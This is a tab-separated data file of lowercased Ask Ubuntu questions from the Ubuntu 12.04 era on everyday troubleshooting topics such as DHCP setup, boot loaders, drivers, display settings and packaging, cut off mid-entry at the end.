151670	testing dhcp server locally on one physical machine with virtual machine	i 'm writing simple program to configure and monitor dhcp server on my ubuntu 12.04 . what i 'm trying to achieve that my physical machine will be dhcp server and my vm ( virtual machine ) get one lease ( and i read that information in leases file ) . i use isc-dhcp-server . i turned off network-manager during tests . i use virtualbox to host vm , network is configured to use bridge adapter . server starts ok , but when my vm is running i got following messages : jun 16 12:15:59 asus dhcpd : dhcpoffer on 192.168.1.3 to 08:00:27:15:26 : a6 ( ubuntu ) via eth0 jun 16 12:15:59 asus dhcpd : dhcpdiscover from 08:00:27:15:26 : a6 ( ubuntu ) via eth0 jun 16 12:15:59 asus dhcpd : dhcpoffer on 192.168.1.3 to 08:00:27:15:26 : a6 ( ubuntu ) via eth0 jun 16 12:16:12 asus dhcpd : dhcpdiscover from 08:00:27:15:26 : a6 ( ubuntu ) via eth0 vm do n't get any dhcpoffers at all . any ideas how to solve this problem ? or different way to test dhcp server locally ? i appreciate any help . thanks in advance . -- -- -- -- -- -- -- -- -- -- -- -- -- -- here 's my dhcp server configuration : /etc/network/interfaces iface eth0 inet static address 192.168.1.2 netmask 255.255.255.0 gateway 192.168.1.1 broadcast 192.168.1.255 /etc/dhcp/dhcpd.conf ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; allow booting ; allow bootp ; subnet 192.168.1.0 netmask 255.255.255.0 { interface eth0 ; range 192.168.1.3 192.168.1.254 ; option routers 192.168.1.1 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; } /etc/default/isc-dhcp-server interfaces= '' eth0 ''
151671	`` error detecting shell '' when launching gnome tweak tool	it was working before i started the process of installing gnome . i 've poked around on google but ca n't find anything . if i log into gnome the screen is massively zoomed in and i have to pan around the page . i was hoping the appropriate setting would be in the tweak tool . __ warning : error detecting shell traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell_extensions.py '' , line 149 , in __init__ shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 38 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 143 , in __init__ proxy = _shellproxy ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 44 , in __init__ result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 148 , in __call__ kwargs.get ( 'flags ' , 0 ) , kwargs.get ( 'timeout ' , -1 ) , none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files warning : shell not running traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 59 , in __init__ self._shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 38 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 143 , in __init__ proxy = _shellproxy ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 44 , in __init__ result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 148 , in __call__ kwargs.get ( 'flags ' , 0 ) , kwargs.get ( 'timeout ' , -1 ) , none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files warning : could not list shell extensions traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 64 , in __init__ extensions = self._shell.list_extensions ( ) attributeerror : shellthemetweak instance has no attribute '_shell' traceback ( most recent call last ) : file `` /usr/bin/gnome-tweak-tool '' , line 76 , in < module > mainwindow ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/mainwindow.py '' , line 44 , in __init__ model ) file `` /usr/lib/python2.7/dist-packages/gtweak/tweakview.py '' , line 40 , in __init__ self._model.load_tweaks ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/tweakmodel.py '' , line 135 , in load_tweaks mods = __import__ ( `` gtweak.tweaks '' , globals ( ) , locals ( ) , tweak_files , 0 ) file `` /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 236 , in < module > gsettingsswitchtweak ( `` org.gnome.settings-daemon.plugins.power '' , `` lid-close-suspend-with-external-monitor '' ) , file `` /usr/lib/python2.7/dist-packages/gtweak/widgets.py '' , line 116 , in __init__ _gsettingstweak.__init__ ( self , schema_name , key_name , **options ) file `` /usr/lib/python2.7/dist-packages/gtweak/widgets.py '' , line 105 , in __init__ options.get ( `` summary '' , self.settings.schema_get_summary ( key_name ) ) , file `` /usr/lib/python2.7/dist-packages/gtweak/gsettings.py '' , line 122 , in schema_get_summary return self._schema._schema [ key ] [ `` summary '' ] keyerror : 'lid-close-suspend-with-external-monitor'
151672	virus pua.script.pdf.embededjs-1	clamtk reported a thread named pua.script.pdf.embededjs-1 when i scan my documents , but did not provide more details . is it a windows virus or linux virus , what this virus does , how this spreads ? i am using ubuntu 12.04 lts
151674	how do i insert a line at the top of a text file using the command line ?	i want to insert text at the top of an already existing file . how can i achieve this . i tried echo and tee but was not successful . i was trying to insert repo line at the top of sources.list file from terminal . note i need an one line quick solution , because another answer 's method was known to me already
151685	protecting oauth secrets in app showdown submissions	i 'm participating in the ubuntu app showdown and my submission is going to make use of third-party web services that use oauth to release their protected data to clients . given that the rules state that the app must be open source , i was wondering if an exemption could be made for a single file containing the oauth secrets , so that they are not being freely distributed . the risk with a distributed oauth secret is that they are bound to specific apps so the service can tell which app is requesting what data from which user . if these secrets get into the open , it will allow parties with malicious intent to imitate a request coming from a legitimate app , causing that app to be blamed for any wrong-doing committed using the compromised credentials . i 'd be willing to provide the credentials file to the judges in private if they so desire . given the general requirement for submissions to the software centre to be open source , perhaps such an exemption could be made in the submission policy as well .
151687	encrypted 3tb usb drive gpt /guid shows wrong size in ubuntu 12.04/64bit	my external usb drive with guid partition table shows wrong size and i am thinking thats stopping truecrypt from mounting it . the disk is formated in win7 and works there fine . the 2. partition is mounted automatically by ubuntu but the 3. partition does not work . the partition is encrypted with trucrypt . gdisk -p disk /dev/sdc : 1565565872 sectors , 746.5 gib logical sector size : 512 bytes disk identifier ( guid ) : aa9bea51-54b9-4ac4-b090-fbd4928b52d7 partition table holds up to 128 entries first usable sector is 34 , last usable sector is 1565565838 partitions will be aligned on 8-sector boundaries total free space is 2014 sectors ( 1007.0 kib ) number start ( sector ) end ( sector ) size code name 1 34 262177 128.0 mib 0c01 microsoft reserved part 2 264192 21235711 10.0 gib 0700 basic data partition 3 21235712 5860530175 2.7 tib 0700 basic data partition the disk size appears as 746 gb as it was mbr but it is gpt gdisk -v problem : partition 3 is too big for the disk . warning ! secondary partition table overlaps the last partition by 4294964337 blocks ! you will need to delete this partition or resize it in another utility . caution : partition 1 does n't begin on a 8-sector boundary . this may result in degraded performance on some modern ( 2009 and later ) hard disks . consult http : //www.ibm.com/developerworks/linux/library/l-4kb-sector-disks/ for information on disk alignment . identified 2 problems ! there is lot of information about internal drives but i cant find any useful information about gpt-usb drives in ubuntu . probably truecrypt cant mount it on linux at all , but there is still the problem with the wrong size . thanks for any suggestions .
151689	unity freezes when laptop screen is closed	i have an asus laptop running ubuntu 12.04 . it 's configured to do nothing when the laptop screen is closed . but sometimes , when i close the screen and when i reopen it , after i move the mouse to reactivate the screen , my unity interface is frozen and i ca n't click on anything . i can move the cursor , and if there 's a music playing it keeps playing , but i ca n't click on anything . i can open a bash shell typing ctrl+alt+f2 , but there i do n't know what to do , i can only login and type sudo reboot to reboot the machine ... is there someone that has the same problem or that knows the solution ?
151690	is there a way to package man pages with quickly ?	if there is , obviously an example would be helpful . a simple `` yes '' is n't sufficient for the check .
151691	power management does not recognize removal of power supply !	i have a lenovo ideapad z370 with ubuntu 11.10 and the battery status indicator shows wrong information . problem : the indicator always shows that the power supply is connected , even if it 's not connected . the battery charges and discharges normally . however , the status information is wrong . when charging , the `` time to charge '' decreases , and when discharging the `` time to charge '' increases . if the power supply is connected the power statistics show : '' supply yes '' '' online yes '' if it is not connected it shows : '' supply yes '' '' online no '' my trials : i tried reinstalling the indicator applet , but that does n't help . searching for solutions or similar problems did n't point out any help . background : the problem occured after i switched the battery mode in windows . ( i use a dual boot system . ) lenovo drivers allow a `` battery runtime mode '' for maximum runtime and a `` battery health mode '' for maximum battery lifetime . i initially used the runtime mode , tried the health mode for some time , but switched back to the runtime mode . the problem occured after switching to health mode . does anyone have an idea what is wrong ? the problem is relevant for me as i get no information when battery status low and the computer runs out of energy without shutdown or hibernation . this is really a problem for me !
151692	ubuntu 12.04 hangs with software center open then opening dash home	i have a dell d610 with intel graphics , 1 gb ram . i have tested the hard drive and ram and both are fine . when i open the software center , then the dash home , my system locks up . the mouse cursor moves but is unresponsive , if i try to right or left click anything . the keyboard is totally unresponsive and i have to hold the power button to power off ! i have reinstalled from cd , did all updates but the issue persists . i tried using the track pad only , and i plugged in an external mouse also but no change . everything else works great ! i am sick of running vista and have no love for metro ! thanks for any suggestions ! ( on a scale of 1 to 10 [ newbie - expert ] i am about 3 . )
151693	configure dual boot , windows 7 and ubuntu 12.04 with or without efi	i have just installed ubuntu 12.04 on a laptop with windows 7 but i do n't get to boot from ubuntu . first , during the installation i made these partitions ( may be too many ) : /dev/sda1 fat32 system 200mb boot ( efi boot , i guess ) /dev/sda2 unknown file system 128 mb msftres ( windows boot manager ) /dev/sda3 ntfs os 100 gb ( windows 7 ) /dev/sda4 ntfs datos 315 gb ( data partition ) /dev/sda5 ext4 28 gb ( /home ) /dev/sda8 unknown file system 1 gb biog_grub ( i 'm not very sure why i made this one ) /dev/sda6 ext4 17 gb ( / ubuntu 12.03 installed withou errors aparently ) /dev/sda7 linex-swap 2 gb ( swap ) i can boot from windows perfectly . actually i tried to configure windows boot manager with easybcd but it does n't recognize any boot entry . anyway , i added an ubuntu entry and it configured it automatically . now i have boot entries the windows 7 one that appear to work and the ubuntu 12.04 that it prompt a `` no application found '' message . i re-started from a usb with ubuntu and tried to fix grub from the command-line and with boot-repair . no results . as far as i understand i have to tell the windows boot manager where my ubuntu boot loader is . so i have two problems : actually , i do n't know where my ubuntu boot loader , grub or grub2 or whatever , is . i do n't know how to set my ubuntu entry in windows boot manager . i guess using bcdedit.exe as easybcd did n't show me the entries . anyway , i do n't know what parameters to use . i read several articles about it but i did n't find out anything useful .
151695	can i trigger a mouse double click , by holding down the primary button , after a delay ?	can i change setting so that the the mouse double-clicks by holding down the primary mouse button ? i do not want hover-click .
151697	login into xfce session without display manager	i am currently using lightdm as my default display manager but i feel like there is no need of display manager in my case because i am always going to login to xfce session . so , is there any way i can disable lightdm and when i boot next time i am just left with terminal where i will enter my username and password . i looked into nodm but i was not able to configure it properly .
151698	which version of debian are ubuntu lts releases based on ?	this answer says : the base of the operating system , debian , comes in three versions : stable , testing and unstable . normally , ubuntu is based on testing ; the lts releases are based on stable . that can not be true then for 12.04 because debian stable ( squeeze ) is almost going to be old-stable , and it 's obvious that the kernel versions in 12.04 , packages , etc . can not have come from debian squeeze . so then what other debian stable is there for precise to be based on ?
151712	unable to connect to wireless network on dell inspiron 1525	i have been using ubuntu since 9.04 and am upgrading with every new version release . recently i have upgraded my laptop dell inspiron 1525 from 11.10 to 12.04 . at the time of upgrade there were some problems which got cleared after trying upgrade for 3 to 4 times . before my first upgrade , i.e . in 11.04 i was able to connect to my wireless network . after the upgrade i am unable to see the wireless network option enabled in the networks shortcut on menu bar . please help me to overcome this problem . ps : i am able to use the wired network .
151717	can i set a price for my application submission ?	when you upload your app for the showcase , can you set a price and still be entered into the competition ? ( i do n't plan to set a price , i 'm just curious . )
151721	ubuntu 12.04 microphone acer aspire one 150	the microphone was set to 0db according to alsamixer . i had trouble seeing how to set to a sensible level . then i found how to set it but , but the microphone is still not working .
151722	how do i upgrade my kernel on the rackspace cloud ?	i 'm running servers on the rackspace cloud -- the first-generation one , not the next-generation open stack one . i believe it 's running xen for the hypervisor . i use the stock images from rackspace . i primarily use 10.04 servers , but i 've also been rolling out new servers with 12.04 . my problem is that i want to keep the kernel up-to-date . i can apt-get dist-upgrade for new kernels , and the installation works fine . however , when i reboot , the server does n't come back up . my guess is that there 's some custom hackery around the grub configuration that makes the stock kernels work , but upgraded kernels fail . has anyone had a similar problem on the rackspace cloud ? what 's the smallest modification i need to make grub boot a new kernel ?
151723	how to create a ppa for a maven project ?	i wanted to try creating my own ppa . the project i have is a java project built with maven . this is what i 've already done so far : created a ppa . set up a new project on launchpad . added a branch that is importing my project from a svn repository . created a recipe for that branch that is publishing the builds to my ppa . this is where i 'm stuck . i 've read the tutorials and googled a lot ; but , i was n't able to find out how to build my project . i can start a build for the branch ; but , as i expected , it fails . i guess i have to put some meta information like a makefile into the repository . is it even possible to build and package maven projects on launchpad ? i also tried to build a .deb file locally using bzr dh-make and debuild . bzr dh-make created a lot of files in the ./debian folder but debuild failed . i guess that it would work if i specified the right meta information in my project so it 's the same problem as on launchpad . i know this is a pretty general question but i think there is a lack of proper tutorials for packaging .deb files even if you do n't have an `` exotic '' case like me . to sum it up : what files/information do i have to provide in my project so that it can be properly build and packaged ? any help would be great : - )
151725	could n't find package ia32-libs	i want to install some android plugins in eclipse on my 64bit ubuntu , but since android is 32bit compatible , i also have to install ia-32-libs . unfortunately , trying to install it gives the following error : could n't find package ia32-libs how should i install this package ?
151729	save chromium browser 's session	how can i manually save the session in chromium-broswer ? i have a notebook with damaged battery ( only gives 5~6 minutes of backup , planning to buy a new one ) , and in our country power outages ( `` load shedding '' ) are quite common . so , i have had to close my session before shutting down my laptop . when i re-open chromium , there is no tab with previous session . the question is : how can i manually save my session before closing the laptop ?
151732	minitube via tsocks and tor does not play or download any video	i can not open youtube . because of government restriction . so when i open minitube , i can not search or watch any video . i used tor and tsocks to open minitube , then i can search by minitube ; but whenever i click on any video , it does not show it ! how can i find and resolve the problem ?
151734	how do i get tutorial for ubuntu application development	i would like to participate ubuntu appshowdown contest if i got time in this exam season . before that i wan na learn python & pygtk to create native ubuntu apps . how do i get tutorial for it ? is there any resources available from ubuntu ? ps : i am already familiar with c/c++ and java . but i prefer python because ubuntu recommends it : - )
151736	can not adjust brightness on acer aspire 5332	i recently installed ubuntu 12.04 with the windows installer . it appears to be running fine , however the screen is extremely dull and i do n't appear to be able to adjust the brightness ... i entered the settings and tried to play with the brightness there , however there is no change in apparent brightness whether it is set to high or low on the menu . i am using an acer aspire 5332 with windows 7 ultimate . it is worth noting that the original keyboard from the laptop no longer works , so i am using a usb keyboard ( meaning that i do n't have access to the fn keys ) ... it 's also worth noting that in recovery mode the brightness seems fine , however the resolution is poor . another thing : i entered the following ( that i found in a similar thread ) : sudo setpci -s 00:02.0 f4.b=00 this solves the issue , however i have to do it again after every restart , is there a way around this ?
151738	ubuntu wo n't start	i 've had ubuntu installed , using wubi , for some time now - a few months or so . it 's worked fine until now , allowing me to login , use it 's features etc ... two days ago , i turned on my computer and started ubuntu . it loaded the gui fine but just showed the loading screen and even after waiting 10 mins on this screen it still would n't show me the login page . i am enthusiastic about web design and development and all of my work , along with my portfolio is stored in ubuntu . cheers , tomas edit : i am using 12.04 lts .
151741	which country has all wifi channels open ?	as in us , we ca n't use anything above 11 , which country has all channels available for use on wifi ?
151743	connecting 2 ubuntu machines as a lan	hi i am trying to connect 2 ubuntu computers as a lan . in my current setup i have : one machine running ubuntu 11.10 with realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller while the other machine is running ubuntu 12.04 with an atheros communications inc ar8152 v1.1 fast ethernet the two machines are connected via a switch ( edimax es-3205p ) . unfortunately i still can not connect the two machines together . can somebody please show me what to do and how to go about solving this issue ? thank you answered all i had to do was set up both ip 's maually , subnet mask to 255.255.255.0 and left blank both gateway and dns .
151749	trying to format drive fails	since i will be doing an internship for which i need to use windows software , i have decided to ruin my day trying to remove my ubuntu 12.04 , install win xp sp3 ( since the dualboot theme from ubuntu suggests to first install windows and then ubuntu , for problems with the bootloader if you do it the other way around ) and then reinstall ubuntu 12.04 since i would like to keep using it as my primary operating system , using winxp exclusively for the internship . other than that , i would like to have a partition for the data , which can be used by both ubuntu and windows . so now , i have used the disk utility run from an ubuntu-live cd to format my drive with master boot record ( being conscious of the fact that this way i will lose all my data , which i have saved on an external drive before , and that my ubuntu wo n't work anymore afterwards ) , creating partitions for windows ( ntfs ) , personal data ( fat , since as far as i know both ubuntu and windows can deal with this ) , a swap partition for linux , and one partition for ubuntu ( ext4 ) ; trying to install win xp from cd gives me a blue screen , which stops the setup and telling me to remove all recently installed drives and to run chkdsk . so i thought , that maybe windows does n't like pre-partitioned drives for its installation and thus i need to re-format my hard drive in order to have a completely `` new '' drive , which i can then , during the windows-installation , partition in order to create the partitions i need . trying to do this , though , the disk-utility run from the live-cd gives me this warning : error creating partition table : helper exited with exit code 1 : in part_create_partition_table : device_file=/dev/sda , scheme=0 got it got disk committed to disk blkrrpart ioctl failed for /dev/sda : device or resource busy i do not understand why it tells me that the hard-drive is busy , because , as stated above , i am doing all this from a live-cd . thus , my questions are : how can i resolve the error given by the disk utility ? does it make sense to use four partitions in the way mentioned above ? and if not so , which partitions should i create ? can i , theoretically , partition my drive from an ubuntu live-cd in order to create the partitions i want and to install first windows and then ubuntu ? update : well.. i was n't aware that i could do that . but anyhow.. i will have to use matlab ( which i know exists also for ubuntu , but i need to get the windows version for the internship ) to analyze neuroimaging data , which needs a lot of system resources . so i wonder if running a virtualized windows on ubuntu and using matlab at the same time wo n't exceed my laptop 's capabilities ? 4gb ram , i3-2310m cpu @ 2.10 ghz x 4 , intel hd3000 integrated graphics what do you mean ? thx for the answer ! edit : just saw the second answer right now . thanks a lot ! ! taking a working backup of my ubuntu would have been pretty elegant , i guess ! next time , in case i ever have to do this again , i will certainly consider this solution ! so now , i will try to create those two ntfs partitions and follow the steps you mentioned.. to be more clear : i was using the disk utility before installing windows , since with my original drive partitioning and formatting , the windows setup gave me the mentioned blue screen ( who knows why ... unfortunately , i am not sure anymore how they were partitioned when i tried the windows installation first , so i ca n't give any hints.. ) . so i tried to change the formats and drive partitions from the live-cd ( since i did not have any os installed at the time ) in order to be able to install windows .
151751	what desktop environment is best suited for small children ?	i 've donated my old laptop to my 3 year old kid . are there any desktop environments designed especially for this age group ?
151753	make windows smaller	currently everything on my laptop takes up too much screen real estate . i can make the launcher icons smaller , the font smaller , i can use ctl- ( minus ) to make the contents of my browser smaller , but i was wondering if there was a way to do this all at once . some way to just tell x to multiply the number of pixels anything should take by .75 . if this is not possible , the main other thing i want to make smaller and have not been able to , is the top bar of any windows , the one with close/minimize/maximize buttons .
151757	freezes during network activity	when i install some app from software center or just download dropbox folder system begins to freeze : almost all running apps stop working and cursor freezes . how to recognize a problem ? system : 12.04 lts 64-bit ( installed with wubi on the sdd with windows 7 ) motherboard : asus commando cpu : q6600
151763	double screen in ubuntu 12.04 ?	i am using ubuntu 12.04 and my video card is ati radeon 5000 . i can not use double screen ( extended version ) . i get this error the selected configuration for displays could not be applied requested position/size for crtc 148 is outside the allowed limit : position= ( 1280 , 0 ) , > size= ( 1280 , 768 ) , maximum= ( 1440 , 1440 ) i tried all display settings but it does not work . some outputs from the system settings : root @ ubuntu : ~ # lshw -c display *-display description : vga compatible controller product : madison [ radeon hd 5000m series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:46 memory : e0000000-efffffff memory : f0020000-f003ffff ioport : d000 ( size=256 ) memory : f0000000-f001ffff root @ ubuntu : ~ # aticonfig -- initial uninitialised file found , configuring . using /etc/x11/xorg.conf saving back-up to /etc/x11/xorg.conf.original-0 root @ ubuntu : ~ # cat /etc/x11/xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection i would appreciate any suggestions how to solve the problem . thank you
151778	launcher application missing white triangle arrow which indicates it is running	this has happened since 11.10 if my memory is correct . if i minimize this application there seem to be no way that i know to get it back . is this a unity bug or compiz bug ? there is no triangle on both sides of the application , different from this question : sometimes applications stay in the background and have an empty white arrow in the launcher . how do i fix this ? the screenshot gimp is running but i do not know how to bring it to the front .
151785	how to fix high pci adapter temperature ?	when running ubuntu 12.04 lts , my acer aspire 4530 laptop and its pci temperatures are around 70 degrees celsius not even an exterior fan does anything about it . how can i make it run cooler ?
151786	i have deleted python files in usr/bin and cant reinstall it	i am a novice at ubuntu and unfortunately i have deleted 3 files in the usr/bin folder python 2.7 python python 2.6 now my update manager wont work and when i type in python into gnome it says that it is no longer there . please help me ive tried loads of different things but it just wont work . the closest i got was the following : i typed in sudo apt-get -f install and i thought i had fixed it but then i got a error message - reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-folks-0.6 gir1.2-polkit-1.0 libcogl5 mutter-common gir1.2-json-1.0 libcaribou0 gir1.2-accountsservice-1.0 gir1.2-clutter-1.0 gir1.2-gkbd-3.0 gir1.2-networkmanager-1.0 caribou libcogl-common libmutter0 gir1.2-mutter-3.0 gjs gir1.2-caribou-1.0 libclutter-1.0-0 gir1.2-telepathylogger-0.2 libclutter-1.0-common cups-pk-helper gir1.2-upowerglib-1.0 gir1.2-cogl-1.0 libmozjs185-1.0 gir1.2-telepathyglib-0.12 gir1.2-gee-1.0 libgjs0c gnome-shell-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : ubuntu-sso-client the following packages will be upgraded : ubuntu-sso-client 1 upgraded , 0 newly installed , 0 to remove and 35 not upgraded . 2 not fully installed or removed . need to get 0 b/57.7 kb of archives . after this operation , 16.4 kb of additional disk space will be used . do you want to continue [ y/n ] ? y setting up python-minimal ( 2.7.2-7ubuntu2 ) ... /var/lib/dpkg/info/python-minimal.postinst : 4 : python2.7 : not found dpkg : error processing python-minimal ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : python-minimal e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any advice is appreciated !
151788	connecting to multiple networks simultaneously ?	does connecting to multiple networks with different subnet in ubuntu actually require some extra steps to work correctly ? i have 2 network interfaces on my computer , one is wired nic and the other is wireless usb adapter . both of them are connected to different routers on different subnet . before you ask $ ip -4 a 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown inet 127.0.0.1/8 scope host lo 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 inet 10.10.1.2/24 brd 10.10.1.255 scope global eth0 4 : wlan1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 inet 192.168.1.2/24 brd 192.168.1.255 scope global wlan1 $ ip -4 r default via 10.10.1.1 dev eth0 proto static 10.10.1.0/24 dev eth0 proto kernel scope link src 10.10.1.2 metric 1 169.254.0.0/16 dev eth0 scope link metric 1000 192.168.1.0/24 dev wlan1 proto kernel scope link src 192.168.1.2 metric 2 $ netstat -rn output kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 10.10.1.1 0.0.0.0 ug 0 0 0 eth0 10.10.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan1 i can ping both of the gateway ip fine but binding a connection to the usb adapter network never work . so any idea how to fix this ?
151790	changelogs of many packages not available	i noticed a few weeks ago that some changelogs of packages that had been updated were not available ( and still are n't ) . `` not available '' means that they 're not accessible using aptitude ( shift+c ) and a web browser just shows error 404 . examples : php5 : http : //packages.ubuntu.com/hardy/php5 sudo : http : //packages.ubuntu.com/hardy/sudo snmp : http : //packages.ubuntu.com/hardy/snmp openssl : http : //packages.ubuntu.com/hardy/openssl ( and some libs that said packages depend on ) i know that not all available packages have changelogs but the ones i mentioned have had until recently . though the above packages are linked particularly to ubuntu hardy , the changelogs of all other lts versions ( lucid and precise ) are missing , too . the subject says `` many '' and not `` all '' changelogs are missing . the changelog of linux-libc-dev is available : http : //packages.ubuntu.com/hardy/linux-libc-dev i opened a discussion regarding this topic on the german ubuntuusers forum : http : //forum.ubuntuusers.de/topic/changelog-der-pakete-nicht-mehr-verfuegbar/ what is going on ? did i miss something ? i also sent an e-mail to the mailing list ubuntu-devel-discuss ( on june 4th ) but obviously the mail was n't forwarded to the list . that 's why i opened this topic .
151792	gui based options : advanced archiving `` zip 7z etc ... ''	does a graphical archive manager exist for linux that has the advanced settings that 7z and others have on windows ? something with settings like `` use here as temp '' `` thread count to use '' `` memory to use '' . i want to start compressing my massive download and etc data into contiguous files .
151795	typing freezes automatically in chromium	i use ubuntu 12.04 and chromium 18.0.1025.151 ( developer build 130497 linux ) . when i try to type anything in search bar of a website , after sometime , it ( typing ) automatically freezes . and the typing restarts when i double click on web address bar . what is the problem ? please help ... .
151800	how to enhance xinit ?	i started with ubuntu 12.04 minimal and added a couple of applications via apt . since these applications require gui , i used sudo apt-get install xinit and to start the applications i am doing startx application-name now i am facing few problems : not having a proper mouse pointer . just have a `` cross '' instead . key combination alt+tab is not working ; i can not switch b/w open windows . the windows are not having minimize , maximize , close buttons . ps2 mouse works well , however usb mouse is not being detected . the system does not output the sound . ( videos on youtube runs but w/o sound ) . optional : i am also looking for a way out to use mouse keys , i.e control mouse pointer using `` keyboard numeric pad may someone please suggest me what all i need to install to rectify these issues . ps : since i require more of a server environment , i am not willing to install a desktop manager .
151804	can i package and include in the ppa the required libraries ?	if some needed modules are not in the ubuntu 12.04 repositories , can i package and include them in the submission ppa for the app showdown ?
151816	how to change the glassy look in gtk3 theme ?	i am wondering how can i change the glass color ( transparency ) in gtk3 ? for example , if one hits the hot-spot corner ( top-left ) and you go to the applications display , there is a layer of glassy sheet . how can i make that brighter because , now , i have black icons ?
151818	windows installer ( trial run )	so windows installer is like a trial run in my mind from what i see . it partitions your hard drive so you can use ubuntu , but ubuntu relies on windows remaining on the system , yes ? so i have 2 questions : 1 . if i do n't like ubuntu how do i remove it ? 2 . if i like ubuntu do i just use the ubuntu part to make the disk ?
151819	how do i swap mouse buttons to be left handed from the terminal ?	i am left handed person . therefore i want to interchange the typical mouse buttons for right and left clicks . i want to do this via terminal . may someone please suggest the command for it ? is it possible to interchange these clicks at the login screen also ? i am using ubuntu 12.04 .
151823	how to install a download .tar.bz linux kernel ?	i have downloaded the latest stable linux kernel release from this site kernel.org my question is , how do i install it in ubuntu 12.04 ?
151825	which is the best format to save a slideshow in openshot ?	my school laptop was recently taken up , which is a macbook air . and i did n't have the chance to create my slideshow before it was taken up , so , i did some research and found that openshot was most similar to imovie on mac . my question is , what is the best format to save it in , in order to burn it on a disc so that it 's good quality and takes up the screen , as in full screen . when i try saving it , it shows me all of these different formats and i 'm just not sure which is best . when i used imovie , which was only a couple of times , i believe i saved it in mpeg-4 . and that seemed to work fine to play on the computer and to upload online , but i just want to be sure i 'm using the best one . if anyone can help , i appreciate it !
151826	how to fix java problem installing matlab 2012a ( 64-bit ) in ubuntu 12.04 ( 64 bit ) ?	i am trying to install matlab 2012a ( 64-bit ) in ubuntu 12.04lts ( 64-bit ) . i have installed java 7 . my java version is : sabyasachi @ sabyasachi-ubuntu : ~/downloads/r2012a_unix $ java -version java version `` 1.7.0_05 '' java ( tm ) se runtime environment ( build 1.7.0_05-b05 ) java hotspot ( tm ) 64-bit server vm ( build 23.1-b03 , mixed mode i am getting the following error while installing matlab : sabyasachi @ sabyasachi-ubuntu : ~/downloads/r2012a_unix $ ./install preparing installation files ... installing ... /tmp/mathworks_18824/sys/java/jre/glnxa64/jre/bin/java : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory finished how can i fix this problem ? when i use -v ( verbose ) option i am getting the following : sabyasachi @ sabyasachi-ubuntu : ~/downloads/r2012a_unix $ sudo ./install -v preparing installation files ... - > dvd = /home/sabyasachi/downloads/r2012a_unix - > arch = glnxa64 - > display = :0 - > testonly = 0 - > jre_loc = /tmp/mathworks_26521/sys/java/jre/glnxa64/jre - > ld_library_path = /tmp/mathworks_26521/bin/glnxa64 command to run : /tmp/mathworks_26521/sys/java/jre/glnxa64/jre/bin/java -splash : '' /home/sabyasachi/downloads/r2012a_unix/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_26521/sys/java/jre/glnxa64/jre/lib/ext : /tmp/mathworks_26521/java/jar : /tmp/mathworks_26521/java/jarext : /tmp/mathworks_26521/java/jarext/axis2/ : /tmp/mathworks_26521/java/jarext/guice/ : /tmp/mathworks_26521/java/jarext/webservices/ com/mathworks/professionalinstaller/launcher -root `` 